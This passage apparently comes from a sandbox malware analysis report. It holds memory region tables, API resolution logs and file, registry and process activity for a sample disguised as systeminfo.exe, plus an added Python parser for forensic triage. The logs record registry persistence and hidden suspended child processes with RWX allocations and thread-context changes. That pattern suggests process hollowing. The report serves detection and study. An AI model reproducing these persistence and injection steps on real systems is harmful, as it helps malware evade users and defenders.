private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
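The region table above for process #6 is what a memory-forensics reader scans for two things: private (non-image) memory that is executable, where an unpacker or injector has placed code (here 0x00100000 and 0x00130000, the first of them dumped), and a mapped PE image whose file name differs from the process's own image (3292.exe mapped inside a process named systeminfo.exe, since the file was renamed before launch). The two private RWX regions at 0x76e70000 and 0x76f70000 also appear in the 3292.exe region table above, so comparing against another process's table is a cheap way to filter them. The parser and the two rules below are an added example written for this page, not VMRay's code; the row format is parsed exactly as printed above, and the sample rows are constructed by copying lines from the two tables.

```python
"""Parser for region rows in the form printed above, with two triage rules.
Added example, not VMRay's own code; sample rows are copied from the tables above."""
from dataclasses import dataclass

BOOL = {"True": True, "False": False}
PERM_WORDS = {"Readable", "Writable", "Executable"}


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    end: int
    kind: str            # "Private Memory", "Memory Mapped File", "Pagefile Backed Memory"
    perms: frozenset     # subset of PERM_WORDS
    monitored: bool
    dump: bool
    yara: bool


def parse_region(line):
    """Parse one row: name, start, end, multi-word type, comma-separated
    permissions, then the Monitored / Dump / YARA Match booleans."""
    t = line.split()
    name, start, end = t[0], int(t[1], 16), int(t[2], 16)
    monitored, dump, yara = (BOOL[x] for x in t[-3:])
    middle = t[3:-3]
    perms = frozenset(w.rstrip(",") for w in middle if w.rstrip(",") in PERM_WORDS)
    kind = " ".join(w for w in middle if w.rstrip(",") not in PERM_WORDS)
    return Region(name, start, end, kind, perms, monitored, dump, yara)


def private_executable(regions, baseline=()):
    """Private memory with execute permission, i.e. code that is not backed by an
    image on disk. Regions whose address range also occurs in `baseline` (another
    process's table) are dropped as platform noise."""
    seen = {(r.start, r.end) for r in baseline}
    return [r for r in regions
            if r.kind == "Private Memory" and "Executable" in r.perms
            and (r.start, r.end) not in seen]


def foreign_images(regions, process_image):
    """Mapped .exe images whose name differs from the process's own image name."""
    return [r for r in regions
            if r.kind == "Memory Mapped File" and r.name.lower().endswith(".exe")
            and r.name.lower() != process_image.lower()]


# Constructed sample: rows copied from the process #6 table above.
PROC6_ROWS = """\
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable, Executable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
""".splitlines()

# Baseline: the same two high regions as listed in the 3292.exe table above.
BASELINE_ROWS = """\
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
""".splitlines()


def triage_process6():
    """Apply both rules to the process #6 sample; returns (private_exec, foreign)."""
    regions = [parse_region(l) for l in PROC6_ROWS]
    baseline = [parse_region(l) for l in BASELINE_ROWS]
    return private_executable(regions, baseline), foreign_images(regions, "systeminfo.exe")


if __name__ == "__main__":
    pe, fi = triage_process6()
    for r in pe:
        print(f"private exec  {r.start:#010x}-{r.end:#010x} dump={r.dump}")
    for r in fi:
        print(f"foreign image {r.name} at {r.start:#010x}")
```

Dumped regions (Dump = True) are the ones the sandbox wrote to disk, so the 0x00100000 hit is the first place to look for the unpacked payload; the 0x00130000 region has no dump and would need a live capture.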
Host Behavior
Module (39)
Operation Module Additional Information Success Count
Load msvcrt.dll base_address = 0x752a0000 True 1
Load KERNEL32.dll base_address = 0x759f0000 True 1
Load USER32.dll base_address = 0x75790000 True 1
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df76c True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df7a4 True 1
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 True 1
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
System (13)
Operation Additional Information Success Count
Get Computer Name result_out = YKYD69Q True 1
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Get Time type = Local Time, time = 2017-11-28 18:18:22 (Local Time) True 6
Get Time type = Ticks, time = 103678 True 4
Mutex (6)
Operation Additional Information Success Count
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Process #7: systeminfo.exe
(Host: 315, Network: 231)
Information Value
ID #7
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:42
OS Process Information
Information Value
PID 0x81c
Parent PID 0xbfc (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x3F0
0x82C
0x84C
0x864
0x874
0x884
0x894
0x8A4
0x8B4
0x8C8
0x788
0x720
0x644
0x51C
0x968
0x2AC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x00081fff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009dfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000a0000 0x000a0000 0x000adfff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable, Executable True False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000110000 0x00110000 0x00117fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000120000 0x00120000 0x00127fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x00120000 0x00120fff Memory Mapped File Readable False False False
index.dat 0x00120000 0x0012bfff Memory Mapped File Readable, Writable True False False
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False
private_0x0000000000140000 0x00140000 0x001bffff Private Memory Readable, Writable True False False
locale.nls 0x001c0000 0x00226fff Memory Mapped File Readable False False False
rsaenh.dll 0x00230000 0x0026bfff Memory Mapped File Readable False False False
rsaenh.dll 0x00230000 0x0026bfff Memory Mapped File Readable False False False
index.dat 0x00230000 0x00237fff Memory Mapped File Readable, Writable True False False
index.dat 0x00240000 0x0024ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x00250fff Private Memory Readable, Writable True False False
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable True False False
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000370000 0x00370000 0x00370fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory Readable True False False
private_0x00000000003a0000 0x003a0000 0x0049ffff Private Memory Readable, Writable True False False
pagefile_0x00000000004a0000 0x004a0000 0x0057efff Pagefile Backed Memory Readable True False False
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False
private_0x00000000005f0000 0x005f0000 0x005fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000600000 0x00600000 0x00787fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000790000 0x00790000 0x00910fff Pagefile Backed Memory Readable True False False
private_0x0000000000920000 0x00920000 0x00b1ffff Private Memory Readable, Writable True False False
private_0x0000000000920000 0x00920000 0x00a1ffff Private Memory Readable, Writable True False False
private_0x0000000000a80000 0x00a80000 0x00abffff Private Memory Readable, Writable True False False
private_0x0000000000ae0000 0x00ae0000 0x00b1ffff Private Memory Readable, Writable True False False
private_0x0000000000b80000 0x00b80000 0x00bbffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x026a0fff Private Memory Readable, Writable True False False
private_0x00000000022e0000 0x022e0000 0x0231ffff Private Memory Readable, Writable True False False
private_0x0000000002340000 0x02340000 0x0237ffff Private Memory Readable, Writable True False False
private_0x00000000023a0000 0x023a0000 0x0249ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0251ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x024dffff Private Memory Readable, Writable True False False
private_0x0000000002510000 0x02510000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002560000 0x02560000 0x0259ffff Private Memory Readable, Writable True False False
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0290ffff Private Memory Readable, Writable True False False
private_0x0000000002910000 0x02910000 0x02b3ffff Private Memory Readable, Writable True False False
private_0x0000000002930000 0x02930000 0x02a2ffff Private Memory Readable, Writable True False False
private_0x0000000002a30000 0x02a30000 0x02afffff Private Memory Readable, Writable True False False
private_0x0000000002a30000 0x02a30000 0x02a6ffff Private Memory Readable, Writable True False False
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False
private_0x0000000002b40000 0x02b40000 0x02c3ffff Private Memory Readable, Writable True False False
private_0x0000000002cc0000 0x02cc0000 0x02dbffff Private Memory Readable, Writable True False False
private_0x0000000002fa0000 0x02fa0000 0x02fdffff Private Memory Readable, Writable True False False
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False
dhcpcsvc.dll 0x74210000 0x74221fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x74230000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x74240000 0x7424dfff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x74250000 0x742a9fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x742b0000 0x742e7fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x744d0000 0x744d5fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x744e0000 0x744e4fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x744f0000 0x744f7fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74500000 0x7453bfff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x74540000 0x74551fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x74560000 0x7456ffff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74570000 0x74575fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74580000 0x7458ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x74590000 0x74595fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x745a0000 0x745acfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x745b0000 0x745c4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x745d0000 0x74621fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74790000 0x747abfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x747b0000 0x747f3fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x748c0000 0x748c6fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74b00000 0x74b20fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74b30000 0x74b6afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b70000 0x74b85fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74b90000 0x74ba6fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74bb0000 0x74bbcfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74bc0000 0x74bcafff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75650000 0x756d2fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x76b00000 0x76b02fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76b10000 0x76b54fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 63 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\programdata\fb6f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb2f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb70.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb70.tmp 0.11 KB (112 bytes) MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
c:\programdata\fb2f.tmp 0.08 KB (87 bytes) MD5: 0b5111a9cc6baab51851f1702403b937
SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d
SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819
False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 48.00 KB (49152 bytes) MD5: f3393556a7ada08dd53548e19467e11f
SHA1: 6109040bf1ee76ce83597326228dd6ac1668f104
SHA256: f066cb2b19cc806d84ebeb3649da5050070a6e608156c217a5f8d1149ff8dee4
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: 50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582
SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e
False
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: 009e3e410a28a8e518f2c6ac83306724
SHA1: 121b97b6c22d60d1dedc8d0160c86e8b9afa5089
SHA256: 960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc
False
Host Behavior
File (14)
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\FB6F.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\ProgramData\FB70.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\ProgramData\FB2F.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create Temp File C:\ProgramData\FB2F.tmp path = C:\ProgramData True 1
Fn
Create Temp File C:\ProgramData\FB70.tmp path = C:\ProgramData True 1
Fn
Create Temp File C:\ProgramData\FB6F.tmp path = C:\ProgramData True 1
Fn
Get Info C:\ProgramData\FB70.tmp type = size True 1
Fn
Get Info C:\ProgramData\FB2F.tmp type = size True 1
Fn
Delete C:\ProgramData\FB6F.tmp - True 1
Fn
Delete C:\ProgramData\FB2F.tmp - True 2
Fn
Delete C:\ProgramData\FB70.tmp - True 2
Fn
Delete C:\ProgramData\FB6F.tmp - False 1
Fn
Registry (20)
Operation Key Additional Information Success Count Logfile
Write Value - value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ True 20
Fn
Process (3)
Operation Process Additional Information Success Count Logfile
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" os_pid = 0x674, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" os_pid = 0xa98, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" os_pid = 0x66c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread (9)
Operation Process Additional Information Success Count Logfile
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Memory (15)
Operation Process Additional Information Success Count Logfile
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
